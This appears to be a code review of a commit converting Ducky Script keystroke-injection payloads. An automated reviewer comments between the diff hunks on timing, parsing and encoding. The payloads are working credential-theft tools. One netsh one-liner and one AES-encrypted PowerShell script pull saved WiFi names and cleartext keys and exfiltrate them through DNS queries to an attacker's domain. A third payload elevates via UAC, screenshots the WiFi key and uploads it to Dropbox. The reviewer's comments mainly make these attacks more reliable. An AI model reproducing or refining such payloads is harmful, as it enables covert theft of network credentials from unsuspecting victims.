STRINGLN for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
STRINGLN exit
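Review bot: `REM Target: WINDOWS` and `REM Purpose: Exfiltrate all saved WiFi names + PSK via DNS` are deleted rather than moved, so this file loses its target metadata just as the other payloads in this commit gain a `Target:` line; move both into the REM_BLOCK above `END_REM`. Timing: the elevation prompt raised by `CTRL-SHIFT ENTER` previously had a full second (`DELAY 1000`) before `ALT Y`, and the `DEFAULT_DELAY 500` now in force halves that; the UAC secure desktop often takes longer than 500 ms to appear, so keep an explicit `DELAY 1000` between those two lines.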


@ -1,3 +1,4 @@
REM_BLOCK
# Title: Exfiltrate WiFi names and preshared keys via AES-256 Encrypted DNS # Title: Exfiltrate WiFi names and preshared keys via AES-256 Encrypted DNS
# Description: Exfiltrates WiFi names and PSK using DNS where the data in transit is encrypted with AES-256 # Description: Exfiltrates WiFi names and PSK using DNS where the data in transit is encrypted with AES-256
# Author: Keld Norman / Twitter: @keld_norman # Author: Keld Norman / Twitter: @keld_norman
@ -18,57 +19,48 @@
3. Open a powershell terminal on your PC, paste in from $scriptblock to the end (also the two extra lines below the script block) 3. Open a powershell terminal on your PC, paste in from $scriptblock to the end (also the two extra lines below the script block)
4. The last line called $encoded will produce an output that is the powershell code in an encoded form 4. The last line called $encoded will produce an output that is the powershell code in an encoded form
4. Use the encoded powershell code in the command below ( paste it in as a replacement for the PUT-THE-ENCODED-CODE-HERE string 4. Use the encoded powershell code in the command below ( paste it in as a replacement for the PUT-THE-ENCODED-CODE-HERE string
END_REM
DUCKY_LANG US DUCKY_LANG US
GUI R DELAY 2000
DELAY 2
STRING cmd.exe
DELAY 1
ENTER
STRING powershell.exe -windowstyle hidden -NoProfile -EncodedCommand PUT-THE-ENCODED-CODE-HERE
ENTER
#----------------------------------------------------------------------------------------------------------- GUI r
# COPY THIS AND PASTE IT IN TO A POWERSHELL TERMINAL ON YOUR OWN WINDOWS PC DELAY 500
#----------------------------------------------------------------------------------------------------------- STRINGLN cmd.exe
DELAY 500
$scriptblock={ STRINGLN powershell.exe -windowstyle hidden -NoProfile -EncodedCommand $scriptblock={
function enc{[CmdletBinding()][OutputType([string])] STRINGLN function enc{[CmdletBinding()][OutputType([string])]
Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T) STRINGLN Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T)
$sha=New-Object System.Security.Cryptography.SHA256Managed STRINGLN $sha=New-Object System.Security.Cryptography.SHA256Managed
$aes=New-Object System.Security.Cryptography.AesManaged STRINGLN $aes=New-Object System.Security.Cryptography.AesManaged
$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC STRINGLN $aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
$aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros STRINGLN $aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros
$aes.BlockSize=128 STRINGLN $aes.BlockSize=128
$aes.KeySize=256 STRINGLN $aes.KeySize=256
$aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K)) STRINGLN $aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K))
$byt=[System.Text.Encoding]::UTF8.GetBytes($T) STRINGLN $byt=[System.Text.Encoding]::UTF8.GetBytes($T)
$cry=$aes.CreateEncryptor() STRINGLN $cry=$aes.CreateEncryptor()
$enc=$cry.TransformFinalBlock($byt,0,$byt.Length) STRINGLN $enc=$cry.TransformFinalBlock($byt,0,$byt.Length)
$enc=$aes.IV+$enc STRINGLN $enc=$aes.IV+$enc
$aes.Dispose() STRINGLN $aes.Dispose()
$sha.Dispose() STRINGLN $sha.Dispose()
$b64=[System.Convert]::ToBase64String($enc).ToCharArray() STRINGLN $b64=[System.Convert]::ToBase64String($enc).ToCharArray()
foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))} STRINGLN foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))}
return $hex STRINGLN return $hex
} STRINGLN }
function dns{ STRINGLN function dns{
$tik=Get-Date -UFormat "%j%H%M%S" STRINGLN $tik=Get-Date -UFormat "%j%H%M%S"
$subchars=get-random -minimum 26 -maximum 50 STRINGLN $subchars=get-random -minimum 26 -maximum 50
[regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly} STRINGLN [regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly}
start-sleep -Seconds $(get-random -minimum 1 -maximum 5) STRINGLN start-sleep -Seconds $(get-random -minimum 1 -maximum 5)
} STRINGLN }
function wifi { STRINGLN function wifi {
$wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1 STRINGLN $wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1
$wifinames.trim() STRINGLN $wifinames.trim()
} STRINGLN }
$KEY="EncryptDataWithThisCode" STRINGLN $KEY="EncryptDataWithThisCode"
$SUB=".i.yourdomain.com" STRINGLN $SUB=".i.yourdomain.com"
wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null STRINGLN wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
} STRINGLN }
$encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock)) STRINGLN $encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))
$encoded STRINGLN $encoded
#-----------------------------------------------------------------------------------------------------------
# END OF STORY
#-----------------------------------------------------------------------------------------------------------
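Review bot: this hunk changes what the payload does, contrary to the commit message. Previously the target ran only `powershell.exe -windowstyle hidden -NoProfile -EncodedCommand PUT-THE-ENCODED-CODE-HERE`, and the `$scriptblock={ ... }` section under "COPY THIS AND PASTE IT IN TO A POWERSHELL TERMINAL ON YOUR OWN WINDOWS PC" was for the operator to run offline to produce the base64 value. Now `STRINGLN powershell.exe -windowstyle hidden -NoProfile -EncodedCommand $scriptblock={` hands `$scriptblock={` to `-EncodedCommand` (not valid base64, so powershell.exe exits with an error), and all the following `STRINGLN` lines, including `$KEY="EncryptDataWithThisCode"` and `$SUB=".i.yourdomain.com"`, are typed into the still-open cmd.exe window in clear text, while the REM_BLOCK still tells the user to replace `PUT-THE-ENCODED-CODE-HERE`, which no longer exists. Restore the original `-EncodedCommand PUT-THE-ENCODED-CODE-HERE` line and keep the script block as comment text (inside the REM_BLOCK or a second REM_BLOCK), since its purpose is offline encoding, not execution on the target.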


@ -1,223 +1,97 @@
REM Title: WiFi_Passwd_Grab REM_BLOCK
REM Author: LulzAnarchyAnon Title: WiFi_Passwd_Grab
REM Description: This is a Three stage payload that begins by navagating to Network Author: LulzAnarchyAnon
REM Description: and Sharing Center. It then opens the wireless properties security Description: This is a Three stage payload that begins by navagating to Network
REM Description: tab, and makes the Network security key visible finally taking a screenshot. Description: and Sharing Center. It then opens the wireless properties security
REM Description: In the Second stage the screenshot is saved to the Downloads folder. Description: tab, and makes the Network security key visible finally taking a screenshot.
REM Description: In the Third, and final stage the screenshot is uploaded via Dropbox. Description: In the Second stage the screenshot is saved to the Downloads folder.
REM Target: Windows 10 PowerShell Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
REM Props: Darren Kitchen and I am Jakoby Target: Windows 10 PowerShell
REM Version: 1.0 Props: Darren Kitchen and I am Jakoby
REM Category: Exfiltration Version: 1.0
Category: Exfiltration
REM This payload may need minor adjustments to run properly depending on This payload may need minor adjustments to run properly depending on
REM Attacker, and Target devices. Attacker, and Target devices.
REM Check out I am Jakoby on Youtube to set up your DropBox for uploads. Check out I am Jakoby on Youtube to set up your DropBox for uploads.
REM THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE! THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 1000
REM Stage 1 REM Stage 1
GUI r GUI r
DELAY 200
STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden
DELAY 1000
ENTER ENTER
DELAY 1000
ALT Y ALT Y
DELAY 1000
GUI r GUI r
DELAY 1000
STRING control.exe /name Microsoft.NetworkAndSharingCenter STRING control.exe /name Microsoft.NetworkAndSharingCenter
DELAY 1000
ENTER ENTER
DELAY 1000
TAB TAB
DELAY 1000
ENTER ENTER
DELAY 1000
TAB TAB
DELAY 1000
ENTER ENTER
DELAY 1000
CTRL TAB CTRL TAB
DELAY 1000
TAB TAB
DELAY 1000 REPEAT 6 SHIFT TAB
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SPACE SPACE
DELAY 2000
PRINTSCREEN PRINTSCREEN
DELAY 2000 REPEAT 3 ALT F4
ALT F4
DELAY 2000
ALT F4
DELAY 2000
ALT F4
DELAY 2000
REM STAGE 2 REM STAGE 2
GUI r GUI r
DELAY 200 STRINGLN powershell -windowstyle hidden
STRING powershell -windowstyle hidden STRINGLN mspaint
ENTER
DELAY 2000
STRING mspaint
ENTER
DELAY 5000
CTRL v CTRL v
DELAY 1000
CTRL s CTRL s
DELAY 1000
ALT d ALT d
DELAY 1000 STRINGLN %USERPROFILE%\Downloads
STRING %USERPROFILE%\Downloads REPEAT 6 TAB
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
STRING wifipasswd STRING wifipasswd
DELAY 1000
ALT s ALT s
DELAY 1000
ALT F4 ALT F4
DELAY 5000
REM STAGE 3
STAGE 3
GUI r GUI r
DELAY 200 STRINGLN powershell
STRING powershell STRINGLN function DropBox-Upload {
DELAY 200 STRINGLN [CmdletBinding()]
ENTER STRINGLN param (
DELAY 2000 STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
STRINGLN [Alias("f")]
STRING function DropBox-Upload { STRINGLN [string]$SourceFilePath
STRINGLN )
DELAY 500 STRINGLN $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
ENTER STRINGLN "
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
STRING [CmdletBinding()] STRINGLN $TargetFilePath="/$outputFile"
DELAY 500 STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
ENTER STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
STRING param ( STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
STRINGLN $headers.Add("Authorization", $authorization)
DELAY 500 STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
ENTER STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)] STRINGLN }
DELAY 500
ENTER
STRING [Alias("f")]
DELAY 500
ENTER
STRING [string]$SourceFilePath
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
STRING $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
DELAY 500
ENTER
STRING "
DELAY 500
ENTER
STRING $outputFile = Split-Path $SourceFilePath -leaf
DELAY 500
ENTER
STRING $TargetFilePath="/$outputFile"
DELAY 500
ENTER
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
DELAY 500
ENTER
STRING $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
DELAY 500
ENTER
STRING $headers.Add("Authorization", $authorization)
DELAY 500
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
DELAY 500
ENTER
STRING }
DELAY 5000
GUI r GUI r
DELAY 200 STRINGLN %USERPROFILE%\Downloads\
STRING %USERPROFILE%\Downloads\ STRINGLN wifipasswd
DELAY 500
ENTER
DELAY 500
STRING wifipasswd
DELAY 1000
GUI r GUI r
DELAY 500 STRINGLN %USERPROFILE%\Downloads\
STRING %USERPROFILE%\Downloads\ STRINGLN wifipasswd
DELAY 500
ENTER
DELAY 500
STRING wifipasswd
DELAY 500
ALT h ALT h
DELAY 200 REPEAT 5 TAB
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
ENTER ENTER
DELAY 500
ALT F4 ALT F4
DELAY 1000
CTRL v CTRL v
DELAY 5000 STRINGLN | DropBox-Upload
STRING | DropBox-Upload
DELAY 500
ENTER
DELAY 5000
ENTER ENTER
ALT F4 ALT F4
DELAY 100
ENTER ENTER
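Review bot: the two `STRINGLN wifipasswd` lines in stage 3 (each following `STRINGLN %USERPROFILE%\Downloads\`) change behaviour: the original `STRING wifipasswd` with no `ENTER` only type-selects the screenshot in the Explorer window so that the subsequent `ALT h` and TAB sequence can act on it, whereas `STRINGLN` sends ENTER and opens the file in its viewer instead; keep those two as `STRING`. Further points in the same hunk: `$DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE` followed by a lone `STRINGLN "` is carried over from the old file and is not valid PowerShell (doubled assignment, unbalanced quotes); it should be a single `STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE"`. `STAGE 3` has lost its `REM` prefix and will not parse, which is exactly the class of error this commit sets out to fix. `REPEAT 6 SHIFT TAB`, `REPEAT 3 ALT F4`, `REPEAT 6 TAB` and `REPEAT 5 TAB` use REPEAT with an inline command; confirm the O.MG parser accepts that form, because in Hak5 Ducky Script `REPEAT n` repeats the previous line, which after `TAB` would give seven TABs rather than six SHIFT TABs. Finally, with `DEFAULT_DELAY 1000` the wait between `STRINGLN mspaint` and `CTRL v` drops from 5000 ms to 1000 ms, and the pause after the `ALT F4` that closes Paint drops from 5000 ms to 1000 ms as well; mspaint is frequently not ready to accept a paste after one second, so keep explicit `DELAY` lines at those two points.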